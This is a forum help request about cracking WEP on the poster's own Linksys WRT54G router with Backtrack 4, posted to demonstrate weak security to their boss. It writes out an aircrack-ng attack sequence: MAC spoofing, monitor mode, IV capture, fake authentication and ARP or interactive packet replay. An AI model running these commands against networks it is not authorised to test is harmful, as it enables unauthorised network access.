Hello
I’m trying to break a wireless password so that I may show my boss how easy (or not) it is to crack. He wants to set up a wifi spot here at work and I want to make sure all the security bases are covered.
I have a Linksys WRT54G ver. 1.1 wireless router with all settings default with the exception of WEP encryption turned on. MAC address filtering is not enabled. I have a desktop computer with an Asus WL-138GE wireless nic that has a Broadcom chipset. I am running Backtrack 4 pre Final from a live CD and I’m having a problem injecting IVs. These are the commands I’m running:
- This gives me low, eth0, wmaster0 and wlan0. I assume wlan0 is the interface I’m looking for.
Code:
airmon-ng stop wlan0
- Interface wlan0 with driver “b43 – [phy0]” is reporting monitor mode disabled.
Code:
macchanger --mac 00:02:B3:EC:EE:F2 wlan0
- Spoofs the MAC to an Intel corporation. I use this because I’ve read that some routers automatically reject MACs that are not real such as 00:11:22:33:44:55
Code:
airmon-ng start wlan0
- This enables monitor mode on mon0 which is my monitoring interface
- Gives me a list of all access points. My Linksys shows up here.
Code:
airodump-ng -c 6 -w linksys.out --bssid xx:xx:xx:xx:xx:xx mon0
- Starts dumping the IVs sent to that access point to linksys.out. xx:xx:xx:xx:xx:xx is of course the access point’s MAC.
At this point I open a new konsole and leave the other one to log.
Code:
aireplay-ng -1 0 -a xx:xx:xx:xx:xx:xx -h 00:02:B3:EC:EE:F2 -e linksys wlan0
- Attempts to authenticate/associate with the router. I get the following message when this is run:
- Sending Authentication Request (Open system) [ACK]
- Authentication successful
- Sending Association Request [ACK]
- Association successful :-) (AID: 1)
Code:
aireplay-ng -3 -b xx:xx:xx:xx:xx:xx -h 00:02:B3:EC:EE:F2 wlan0
- This command should start injecting IVs and my #Data should be going up in my logging screen but it isn’t. This is what I get:
- Read xxxx packets (got 0 ARP requests and 0 ACKs), sent 0 packets…(0 pps)
At this point I’ve read that this command could also work:
Code:
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b xx:xx:xx:xx:xx:xx -h 00:02:B3:EC:EE:F2 wlan0
- It only says Read xxx packets and my #Data does not increase
If I attach another computer to the access point and start browsing the web my #Data goes up and I can crack the key but I want to break the password without a client attached. I thought maybe injection isn’t working so I tried the following:
Code:
aireplay-ng -9 wlan0
- It tells me injection is working and found my Linksys. With the direct probe request it gave me 30/30 100% for my Linksys.
I’ve been searching and reading the replies on this board in an attempt to try to find a solution to this problem but I haven’t come across anything that’s helped me. If anyone has any suggestions please post away. Thanks.